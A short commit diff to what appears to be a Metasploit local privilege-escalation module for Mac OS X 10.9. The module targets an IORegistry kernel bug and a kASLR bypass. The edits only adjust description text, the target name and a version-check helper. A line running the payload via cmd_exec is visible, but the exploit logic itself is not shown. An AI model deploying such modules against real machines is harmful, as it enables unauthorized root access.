@@ -21,7 +21,7 @@ def initialize(info={})
21
21
corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel
22
22
pointers can also be leaked, allowing a full kASLR bypass.
23
23
24
- Tested on Mavericks 10.9.5, and should possibly work on previous versions.
24
+ Tested on Mavericks 10.9.5, and should work on previous versions.
25
25
26
26
The issue has been patched silently in Yosemite.
27
27
} ,
@@ -44,7 +44,7 @@ def initialize(info={})
44
44
'Arch' => [ ARCH_X86_64 ] ,
45
45
'SessionTypes' => [ 'shell' , 'meterpreter' ] ,
46
46
'Targets' => [
47
- [ 'Mac OS X 10.9 Mavericks x64 (Native Payload)' ,
47
+ [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)' ,
48
48
{
49
49
'Platform' => 'osx' ,
50
50
'Arch' => ARCH_X86_64
@@ -57,7 +57,7 @@ def initialize(info={})
57
57
end
58
58
59
59
def check
60
- if ver_lt ( xnu_ver , "10.10" )
60
+ if ver_lt ( osx_ver , "10.10" )
61
61
Exploit ::CheckCode ::Vulnerable
62
62
else
63
63
Exploit ::CheckCode ::Safe
@@ -85,7 +85,7 @@ def exploit
85
85
cmd_exec ( "#{ tmpfile } #{ payloadfile } " )
86
86
end
87
87
88
- def xnu_ver
88
+ def osx_ver
89
89
cmd_exec ( "sw_vers -productVersion" ) . to_s . strip
90
90
end
91
91
0 commit comments